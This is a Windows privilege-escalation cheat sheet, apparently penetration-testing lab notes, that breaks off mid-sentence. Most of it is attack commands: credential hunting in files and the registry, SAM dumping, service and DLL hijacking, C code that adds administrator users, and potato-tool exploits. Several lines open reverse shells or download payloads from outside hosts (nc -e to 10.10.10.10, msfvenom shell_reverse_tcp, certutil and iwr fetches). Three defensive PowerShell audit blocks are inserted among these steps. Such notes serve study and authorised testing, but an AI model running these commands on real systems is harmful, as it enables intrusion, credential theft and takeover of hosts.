Windows
solving the color problem when running winPEAS
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
Enumeration
search for the password keyword across the file system
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
findstr /si password *.txt
installed software with version
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*, HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Format-Table -AutoSize
get windows version
wmic os get Caption, Version, OSArchitecture
(Get-WmiObject -Class Win32_OperatingSystem).Caption, (Get-WmiObject -Class Win32_OperatingSystem).Version, (Get-WmiObject -Class Win32_OperatingSystem).OSArchitecture
Get-ComputerInfo | Select-Object WindowsProductName, WindowsVersion, OSArchitecture
list all drives
fsutil fsinfo drives
check hidden files in every user's directory
ls -force c:\Users\*\*\*
tree /f /a c:\Users\
search for interesting files
Get-ChildItem -Path C:\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,SAM,SYSTEM -File -Recurse -ErrorAction SilentlyContinue
gci -path . -recurse -ea SilentlyContinue -Include *.ini,*.yml,*.ps1,*.cfg | select-string pass
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ *.config
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore
#search for password txt files
dir /s "c:\password*.txt"
alternate data streams
dir /R
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
12/24/2017 03:51 AM 36 hm.txt
34 hm.txt:root.txt:$DATA
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 2,649,677,824 bytes free
powershell Get-Content -Path "hm.txt" -Stream "root.txt"
search for KeePass databases
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
determine the PowerShell history path
(Get-PSReadlineOption).HistorySavePath
ls C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
#looping in each history user
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
check which account a specific service runs as
Get-WmiObject -Class Win32_Service -Filter "Name='Apache2.4'" | Select-Object Name, DisplayName, StartMode, StartName, State, Status
enumerate services installed on the machine
Get-Service
wmic service get DisplayName, State, StartMode
Get-WmiObject -Class Win32_Service
cmd.exe /c sc queryex state=all type=service
enumerate executables launched by scheduled tasks
schtasks /query /fo LIST /v | Select-String -Pattern "\.exe"
enumerate enabled local users
Get-LocalUser
Name Enabled Description
---- ------- -----------
Administrator False Built-in account for administering the computer/domain
DefaultAccount False A user account managed by the system.
Guest False Built-in account for guest access to the computer/domain
nelly True
offsec True
WDAGUtilityAccount False A user account managed and used by the system for Windows Defender Application Guard scen...
...
enumerate the registry
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
# SNMP Parameters
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v Password
interesting config files
#Check these files; they may contain the administrator password in plain text or base64 encoding
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\system32\sysprep\sysprep.xml
C:\Windows\system32\sysprep.inf
C:\xampp\tomcat\conf\tomcat-users.xml
#SAM and SYSTEM files in backups
C:\Windows\System32\config
C:\Windows\System32\config\RegBack
C:\Windows\RegBack
enumerate GPOs
Import-Module .\powerview
Get-GPO -Name "Default Domain Policy"
#get permissions
Get-GPPermission -Guid 31b2f340-016d-11d2-945f-00c04fb984f9 -TargetType User -TargetName anirudh

=> if we find these permissions we can abuse them with SharpGpoAbuse.exe
Config files
WordPress
The WordPress config file contains the MySQL database password.

#dumping creds from the WordPress database
use wordpress;
show tables;
select * from wp_users;
phpMyAdmin
Configuration files that contain passwords for database connections via MySQL
C:\wamp\apps\phpmyadmin3.4.10.1\config.inc.ini.php
C:\xampp\phpMyAdmin\config.inc.php
C:\xampp\phpMyAdmin\setup\config.php
web path of phpMyAdmin
http://localhost/phpmyadmin/index.php
test whether phpMyAdmin is reachable from the local host
curl http://localhost/phpmyadmin -L
XAMPP
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
#contains the website's bind addresses and ports
C:\xampp\apache\conf\httpdcon
passwords.txt contains the passwords for MySQL, WebDAV, FileZilla FTP, ...
C:\xampp> type passwords.txt
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:
(means no password!)
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).
to start the XAMPP server
C:\xampp\xampp_start.exe
C:\xampp\apache\bin\httpd.exe
C:\xampp\mysql\bin\mysqld.exe
check if MySQL is running
cmd /c sc qc Mysql
Service Exploits
Service Weak Permissions
check the user's permissions over rsEDRSvc
accesschk.exe /accepteula -uwcqv SimpleUser rsEDRSvc
RW rsEDRSvc
SERVICE_ALL_ACCESS
hijack the service
sc config rsEDRSvc binpath= "C:\shell.exe"
start the service
net start rsEDRSvc
other hijacking methods
sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd /c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
net.exe start <Service_Name>
Service Binary Hijacking
enumerate running services
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
wmic service get name,displayname,pathname,startmode
determine our permissions on the service binary
PS C:\Users\dave> icacls "C:\xampp\apache\bin\httpd.exe"
C:\xampp\apache\bin\httpd.exe BUILTIN\Administrators:(F)
NT AUTHORITY\SYSTEM:(F)
BUILTIN\Users:(RX)
NT AUTHORITY\Authenticated Users:(RX)
Successfully processed 1 files; Failed processing 0 files
#check which account runs this service
sc qc test
create a C program that adds a new user to the local administrators group
#include <stdlib.h>

int main(void)
{
    /* create the user, then add it to the local administrators group */
    system("net user dave2 password123! /add");
    system("net localgroup administrators dave2 /add");
    return 0;
}
compile it
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
download the file and replace the service binary with it
PS C:\Users\dave> iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe
PS C:\Users\dave> move C:\xampp\mysql\bin\mysqld.exe mysqld.exe
PS C:\Users\dave> move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe
stop the service
net stop mysql
check startup type of the service
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
Name StartMode
---- ---------
mysql Auto
restart the machine
shutdown /r /t 0
#if we are connected via WinRM, shutdown will not work; use RunasCs instead
.\RunasCs.exe x x 'shutdown /r /t 0' -l 9
Unquoted Service Paths
enumerate stopped and running services
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
enumerate unquoted service paths
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
Name PathName
...
GammaService C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe
check the permissions of each directory along the path
icacls "C:\"
icacls "C:\Program Files"
icacls "C:\Program Files\Enterprise Apps"
Service DLL Hijacking
enumerate running services
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
check permissions
icacls .\Documents\BetaServ.exe
.\Documents\BetaServ.exe NT AUTHORITY\SYSTEM:(F)
BUILTIN\Administrators:(F)
CLIENTWK220\steve:(RX)
CLIENTWK220\offsec:(F)
Successfully processed 1 files; Failed processing 0 files
check the PATH environment variable
$env:path
create a simple DLL that adds a user
#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
    HANDLE hModule,            // Handle to DLL module
    DWORD  ul_reason_for_call, // Reason for calling function
    LPVOID lpReserved)         // Reserved
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        system("net user dave2 password123! /add");
        system("net localgroup administrators dave2 /add");
        break;
    case DLL_THREAD_ATTACH:  // A process is creating a new thread.
        break;
    case DLL_THREAD_DETACH:  // A thread exits normally.
        break;
    case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}
compile it
x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll
Weak Registry Permissions
check a specific service
#enumerate the service to see which account it runs as
sc qc regsvc
#check registry keys permission
C:\test\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
=> if we find KEY_ALL_ACCESS granted to a group we are a member of, we can abuse it

set the service's ImagePath registry value to our executable
reg add HKLM\System\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\PrivESC\reverse.exe /f
check if the value was set correctly
reg query HKLM\System\CurrentControlSet\services\regsvc
check if we have permission to start the service
accesschk.exe /accepteula -uwcqv SimpleUser regsvc
start the service
net start regsvc
check the ACL of the services key in the registry
$acl = get-acl HKLM:\SYSTEM\CurrentControlSet\Services
ConvertFrom-SddlString -Sddl $acl.Sddl | Foreach-Object {$_.DiscretionaryAcl}
#search for all services running as LocalSystem
$services = Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\*
$services | where {($_.ObjectName -match 'LocalSystem')}
#also check the Start property: a value of 3 means the service can be started manually
$services | Where-Object {($_.ObjectName -eq "LocalSystem") -and ($_.Start -eq 3)}
#now search for services we can start: use sc sdshow to display the security descriptors (DACLs) of those services and match an ACE that grants RP (start) to Authenticated Users
$services = Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\*
$services_tmp = $services | Where-Object {($_.ObjectName -eq "LocalSystem") -and ($_.Start -eq 3)}
$service_names = $services_tmp.PSChildName
foreach ($name in $service_names) {
    $sddl = sc.exe sdshow $name
    if ($sddl -match "RP[A-Z]*?;;;AU") {
        $name
    }
}
#confirm the start type is 3 and the service runs as LocalSystem
sc.exe qc wuauserv
#we can now modify the service's ImagePath to point at an executable we control
Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\wuauserv -name ImagePath -value "C:\windows\system32\spool\drivers\color\nc.exe -e powershell.exe 10.10.14.26 4447"
#start the service
sc.exe start wuauserv
Below are the Start Property values and their description.

In SDDL, the right to start a service is RP and the right to stop it is WP:
RP — SERVICE_START
WP — SERVICE_STOP
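The SDDL that `sc.exe sdshow` prints is compact enough to parse directly, which makes it easy to answer "which principals can start, stop or reconfigure this service?" for every service on a host instead of eyeballing one regex hit. The following is an added example, not part of the original notes: `ConvertFrom-ServiceSddl`, `Get-BroadServiceControl`, the two lookup tables and the sample SDDL string are all assumptions of this example. The sample is constructed so that SYSTEM and Administrators hold full control while Authenticated Users (AU) have been granted RP and WP; the last, commented-out line shows how to feed a live service's descriptor into the same function.

```powershell
# Added example (not part of the original notes): parse the SDDL string that
# "sc.exe sdshow <service>" prints and list which principals may start, stop or
# reconfigure the service. RP/WP follow the mapping above; DC, WD, WO and the
# generic rights are included because they also let a caller change what the
# service executes.

$RightsOfInterest = @{
    'RP' = 'SERVICE_START';         'WP' = 'SERVICE_STOP'
    'DC' = 'SERVICE_CHANGE_CONFIG'; 'WD' = 'WRITE_DAC'
    'WO' = 'WRITE_OWNER';           'GA' = 'GENERIC_ALL'
    'GW' = 'GENERIC_WRITE'
}
# SDDL trustee abbreviations that cover every ordinary logged-on user.
$BroadTrustees = @{
    'AU' = 'Authenticated Users'; 'BU' = 'BUILTIN\Users'
    'WD' = 'Everyone';            'IU' = 'Interactive'
}

function ConvertFrom-ServiceSddl {
    # Returns one object per DACL ACE: Type (A = allow, D = deny), Trustee, Rights.
    param([Parameter(Mandatory)][string]$Sddl)
    # Only the DACL (D:...) matters here; the SACL (S:...) holds audit entries.
    $dacl = [regex]::Match($Sddl, 'D:(?<dacl>.*?)(?:S:|$)')
    if (-not $dacl.Success) { throw "No DACL in SDDL: $Sddl" }
    $acePattern = '\((?<type>[^;]*);(?<flags>[^;]*);(?<rights>[^;]*);[^;]*;[^;]*;(?<trustee>[^)]*)\)'
    foreach ($ace in [regex]::Matches($dacl.Groups['dacl'].Value, $acePattern)) {
        $rightsField = $ace.Groups['rights'].Value
        # Rights are two-letter tokens; a hex mask (0x...) is passed through as-is.
        $tokens = @($rightsField)
        if ($rightsField -notlike '0x*') { $tokens = [regex]::Matches($rightsField, '..') | ForEach-Object { $_.Value } }
        $trustee = $ace.Groups['trustee'].Value
        $broad = $BroadTrustees.ContainsKey($trustee)
        [pscustomobject]@{
            Type      = $ace.Groups['type'].Value
            Trustee   = $trustee
            Principal = $(if ($broad) { $BroadTrustees[$trustee] } else { $trustee })
            Broad     = $broad
            Rights    = @($tokens | Where-Object { $RightsOfInterest.ContainsKey($_) } |
                          ForEach-Object { $RightsOfInterest[$_] })
        }
    }
}

function Get-BroadServiceControl {
    # Allow ACEs that give a broad trustee at least one right of interest.
    param([Parameter(Mandatory)][string]$Sddl)
    ConvertFrom-ServiceSddl -Sddl $Sddl |
        Where-Object { $_.Type -eq 'A' -and $_.Broad -and $_.Rights.Count -gt 0 }
}

# Constructed sample in the shape sc.exe prints: SYSTEM and Administrators hold
# full control, Authenticated Users have additionally been granted RP and WP.
$sample = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)' +
          '(A;;CCLCSWRPWPLOCRRC;;;AU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'
Get-BroadServiceControl -Sddl $sample | Format-Table Principal, Rights -AutoSize

# Live check of one service on the host (needs sc.exe, i.e. Windows):
# Get-BroadServiceControl -Sddl ((sc.exe sdshow wuauserv) -join '')
```

The parser deliberately ignores deny ACEs when deciding what is "broad"; a deny entry for the same trustee would override an allow, so a hit is a lead to confirm with `sc.exe sdshow` and `accesschk`, not a verdict on its own. The remediation for a hit is to remove the start/stop/change-config rights from the broad trustee with `sc.exe sdset` or by resetting the service's security descriptor through Group Policy.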
Registry Exploits
AutoRuns
check autorun programs
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SecurityHealth REG_EXPAND_SZ %windir%\system32\SecurityHealthSystray.exe
RtkAudUService REG_SZ "C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_c607c18cb15933d8\RtkAudUService64.exe" -background
WavesSvc REG_SZ "C:\Windows\System32\DriverStore\FileRepository\wavesapo8de.inf_amd64_b4d0b189ff2aba03\WavesSvc64.exe" -Jack
KeePass 2 PreLoad REG_SZ "C:\Program Files\KeePass Password Safe 2\KeePass.exe" --preload
now check the permissions
accesschk.exe /accepteula -wvu "C:\Program Files\KeePass Password Safe 2\KeePass.exe"
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\Program Files\KeePass Password Safe 2\KeePass.exe
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
let's abuse it
#make backup
move "C:\Program Files\KeePass Password Safe 2\KeePass.exe" C:\Temp
#set our shell
copy /Y shell.exe "C:\Program Files\KeePass Password Safe 2\KeePass.exe"
AlwaysInstallElevated
The AlwaysInstallElevated setting makes Windows Installer packages (.msi) run with administrative privileges by default.
#check whether the value is set to 0x1 in both hives
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

#generating msi payload with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f msi -o reverse.msi
#run the msi
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
Abusing Stored Passwords
Autologon
Enumerate autologon
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
<SNIP>
AutoAdminLogon REG_SZ 1
DefaultUserName REG_SZ htb-student
DefaultPassword REG_SZ HTB_@cademy_stdnt!
check whether there are any credentials in the Autologon registry key
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
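Both of the registry conditions above (AlwaysInstallElevated and Winlogon autologon) are cheap to audit from an administrator's console, and the result is more useful as a structured finding than as a raw `reg query` dump. The block below is an added example, not part of the original notes; the function names `Get-AlwaysInstallElevatedFinding`, `Get-AutologonFinding` and `Invoke-RegistryCredentialAudit` are assumptions of this example. It encodes the two details that matter for triage: AlwaysInstallElevated only takes effect when both the HKLM and the HKCU value are 1, and an autologon password is a finding because it sits in clear text in `DefaultPassword` (or `AltDefaultPassword`). The audit reports which values are present and never prints the secret itself.

```powershell
# Added example (not part of the original notes): audit the two registry
# conditions above (AlwaysInstallElevated and Winlogon autologon) and return
# them as findings with a remediation. Secrets are reported by name only.

function Get-AlwaysInstallElevatedFinding {
    # The policy only takes effect when BOTH the machine and the user value are 1.
    $paths = @{
        Machine = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        User    = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }
    $state = @{}
    foreach ($scope in @($paths.Keys)) {
        $item = Get-ItemProperty -Path $paths[$scope] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $state[$scope] = [int]($item.AlwaysInstallElevated -eq 1)   # absent value counts as 0
    }
    [pscustomobject]@{
        Check       = 'AlwaysInstallElevated'
        Machine     = $state['Machine']
        User        = $state['User']
        Exploitable = ($state['Machine'] -eq 1 -and $state['User'] -eq 1)
        Fix         = 'Disable "Always install with elevated privileges" under both Computer and User Configuration > Administrative Templates > Windows Components > Windows Installer'
    }
}

function Get-AutologonFinding {
    # Winlogon autologon keeps the password in clear text; report which values exist.
    $key   = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    $secretNames = @('DefaultPassword', 'AltDefaultPassword')
    $present = @($secretNames | Where-Object { -not [string]::IsNullOrEmpty($props.$_) })
    [pscustomobject]@{
        Check           = 'Winlogon autologon'
        AutoAdminLogon  = [string]$props.AutoAdminLogon
        DefaultUserName = [string]$props.DefaultUserName
        ClearTextValues = $present
        Exploitable     = ($present.Count -gt 0)
        Fix             = 'Delete the clear-text values; if autologon is required, configure it with Sysinternals Autologon, which stores the password as an LSA secret instead'
    }
}

function Invoke-RegistryCredentialAudit {
    Get-AlwaysInstallElevatedFinding
    Get-AutologonFinding
}

Invoke-RegistryCredentialAudit | Format-List
```

Run it in the context of the user being reviewed, since the HKCU half of AlwaysInstallElevated is per user; an elevated prompt started as a different account will report that account's hive, not the one you meant to check.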
Putty
#Check the values saved in each session, user/password could be there
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername"
#query the session found by the previous command to display creds
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
Password in Registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
cmdkey
#Runas with saved credentials
cmdkey /list
runas /savecred /user:admin
runas /user:DVR4\administrator "C:\Windows\System32\cmd.exe /c C:\Users\viewer\rev.exe"
Configuration Files
search recursively for files whose name contains "pass" or that end with .config
dir /s *pass* == *.config
search recursively for files containing "password" that end with .xml, .ini or .txt
findstr /si password *.xml *.ini *.txt
SAM & SYSTEM
C:\Windows\System32\config
C:\Windows\System32\config\RegBack
C:\Windows\RegBack
#dump SAM & SYSTEM
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
C:\Windows write permissions

with write access to C:\Windows we can hijack any DLL; in this example we use systeminfo's tzres.dll
hijacking the systeminfo DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=135 -f dll -o tzres.dll
certutil -urlcache -split -f http://IP C:\windows\System32\wbem\tzres.dll
#trigger the malicious DLL to get a reverse shell
systeminfo
Scheduled Tasks
list all scheduled tasks
PS C:\Users\steve> schtasks /query /fo LIST /v
...
Folder: \Microsoft
HostName: CLIENTWK220
TaskName: \Microsoft\CacheCleanup
Next Run Time: 7/11/2022 2:47:21 AM
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 7/11/2022 2:46:22 AM
Last Result: 0
Author: CLIENTWK220\daveadmin
Task To Run: C:\Users\steve\Pictures\BackendCacheCleanup.exe
Start In: C:\Users\steve\Pictures
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: daveadmin
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Minute
Start Time: 7:37:21 AM
Start Date: 7/4/2022
...
#check this file
c:\WINDOWS\SchedLgU.Txt
#another PowerShell command
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
check permissions
PS C:\Users\steve> icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
C:\Users\steve\Pictures\BackendCacheCleanup.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
CLIENTWK220\steve:(I)(F)
CLIENTWK220\offsec:(I)(F)
monitor the exe to see whether the scheduled task runs it
Get-Process backup -ErrorAction SilentlyContinue | Watch-Command -Difference -Continuous -Seconds 30
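The three "replace the binary" cases above (a writable service binary, an unquoted service path with a writable directory in it, and a scheduled task whose action points at a writable file) all reduce to the same audit question: is there a path that ordinary users can write to but that a service or task executes as another account? The block below is an added example, not part of the original notes; `Test-BroadWriteAccess`, `Get-UnquotedPathCandidates`, `Get-ServiceFindings`, `Get-TaskFindings`, the `$BroadWriters` list and the rights mask are assumptions of this example. It goes slightly beyond the single GammaService case above by generating every intermediate executable the service control manager would try for an unquoted path, and checks the parent directory of each.

```powershell
# Added example (not part of the original notes): one audit pass over the
# "replace the binary" cases above: service binaries, unquoted service paths
# and scheduled-task actions. A finding is a path that a broad principal can
# write to while a service or task executes it as another account.
# Run from an elevated PowerShell so every ACL and every task is readable.

# Principals whose write access turns a path into a finding.
$BroadWriters = @('Everyone', 'BUILTIN\Users',
                  'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Rights that let a caller overwrite a file or drop a file into a directory.
# AppendData is left out on purpose: on C:\ it only allows creating folders.
$WriteMask = [System.Security.AccessControl.FileSystemRights]'WriteData, Delete, ChangePermissions, TakeOwnership'
$InheritOnly = [System.Security.AccessControl.PropagationFlags]::InheritOnly

function Test-BroadWriteAccess {
    # True when an Allow ACE that applies to $Path itself grants one of
    # $BroadWriters a right in $WriteMask. Deny ACEs and generic-right masks
    # are not resolved, so treat a hit as "confirm with icacls", not as proof.
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if (($rule.PropagationFlags -band $InheritOnly) -ne 0) { continue }
        if ($BroadWriters -notcontains $rule.IdentityReference.Value) { continue }
        if (([int]$rule.FileSystemRights -band [int]$WriteMask) -ne 0) { return $true }
    }
    return $false
}

function Get-ExecutableFromCommand {
    # '"C:\Program Files\App\svc.exe" -arg'  ->  C:\Program Files\App\svc.exe
    param([Parameter(Mandatory)][string]$Command)
    $cmd = [Environment]::ExpandEnvironmentVariables($Command.Trim()).TrimStart('"')
    if ($cmd -match '^(?<exe>.*?\.exe)') { return $Matches['exe'] }
    return ($cmd -split ' ')[0]
}

function Get-UnquotedPathCandidates {
    # Executables the service control manager tries before the real one when
    # an ImagePath with spaces is unquoted, e.g. for
    #   C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe
    # -> C:\Program.exe, C:\Program Files\Enterprise.exe,
    #    C:\Program Files\Enterprise Apps\Current.exe
    param([Parameter(Mandatory)][string]$PathName)
    if ($PathName.TrimStart().StartsWith('"')) { return @() }
    $exe = Get-ExecutableFromCommand $PathName
    if ($exe -notmatch ' ') { return @() }
    $parts = $exe -split ' '
    $candidates = @()
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates
}

function New-Finding($Kind, $Name, $RunsAs, $Path) {
    [pscustomobject]@{ Kind = $Kind; Name = $Name; RunsAs = $RunsAs; Path = $Path }
}

function Get-ServiceFindings {
    foreach ($svc in (Get-CimInstance -ClassName Win32_Service)) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ExecutableFromCommand $svc.PathName
        # Overwriting the binary or replacing it via its directory both count.
        foreach ($p in @($exe, (Split-Path -Path $exe -Parent))) {
            if ($p -and (Test-BroadWriteAccess $p)) { New-Finding 'ServiceBinary' $svc.Name $svc.StartName $p }
        }
        foreach ($cand in (Get-UnquotedPathCandidates $svc.PathName)) {
            $dir = Split-Path -Path $cand -Parent
            if ($dir -and (Test-BroadWriteAccess $dir)) { New-Finding 'UnquotedPathDir' $svc.Name $svc.StartName $dir }
        }
    }
}

function Get-TaskFindings {
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
            $exe = Get-ExecutableFromCommand $action.Execute
            if ($exe -and (Test-BroadWriteAccess $exe)) {
                New-Finding 'TaskAction' $task.TaskName $task.Principal.UserId $exe
            }
        }
    }
}

function Invoke-WritablePathAudit {
    @(Get-ServiceFindings) + @(Get-TaskFindings)
}

Invoke-WritablePathAudit | Sort-Object Kind, Name | Format-Table -AutoSize
```

A `ServiceBinary` or `TaskAction` finding is fixed by restoring admin-only write access on the file (and its directory); an `UnquotedPathDir` finding is fixed by quoting the ImagePath (`sc.exe config <name> binPath= "\"C:\Program Files\...\GammaServ.exe\""`) and by tightening the writable directory, because quoting alone leaves the directory open for other abuse.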
Windows Privileges
SeImpersonatePrivilege
RunasCs.exe backdoor Password123 "C:/Users/Public/reverse.exe" --force-profile --logon-type 8
1-PrintSpoofer
download PrintSpoofer
iwr -uri http://192.168.119.2/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe
exploit PoC
.\PrintSpoofer64.exe -i -c powershell.exe
.\PrintSpoofer64.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> whoami
whoami
nt authority\system
=> will not work if the Spooler service is disabled on the machine
Get-Service -Name Spooler
2-RoguePotato
on our Kali machine
socat TCP-LISTEN:135,fork TCP:$IP-Target:9999
on the target machine
RoguePotato.exe -r $IP-Kali -e "shell.exe" -l 9999
=> will not work if inbound 135 is blocked; test the connection from the target machine
wget 192.168.45.168/test -usebasicparsing
3-SharpEfsPotato
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami"
4-GodPotato
First we need to know the .NET framework version.
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
execute whoami to check that it works
GodPotato.exe -cmd "cmd /c whoami"
#set a new password for Administrator, but note the old admin password; you may need it later to pivot...
GodPotato.exe -cmd "cmd /c net user Administrator Password123"
#executing a reverse shell
GodPotato.exe -cmd "c:\TMP\shell.exe"
5-SweetPotato
SweetPotato.exe -a whoami
.\SweetPotato.exe -e EfsRpc -p c:\Users\Public\nc.exe -a "10.10.10.10 1234 -e cmd"
=> will not work if the Spooler service is disabled
6-JuicyPotato
x86
.\Juicy.Potato.x86.exe -l 1360 -p c:\windows\system32\cmd.exe -a "/c whoami" -t *
if it fails:

The default CLSID did not work, so we hunt for a new one and pass it with the -c argument:
.\Juicy.Potato.x86.exe -l 1360 -p c:\windows\system32\cmd.exe -a "/c whoami" -t * -c <CLSID HERE>
this site contains a list of CLSIDs; use one.
Be sure to pick CLSIDs where the user is NT AUTHORITY\SYSTEM

Over time I learned the Windows Update Service (wuauserv) is a good choice. Who shuts that off?

and it worked

this is the complete command:
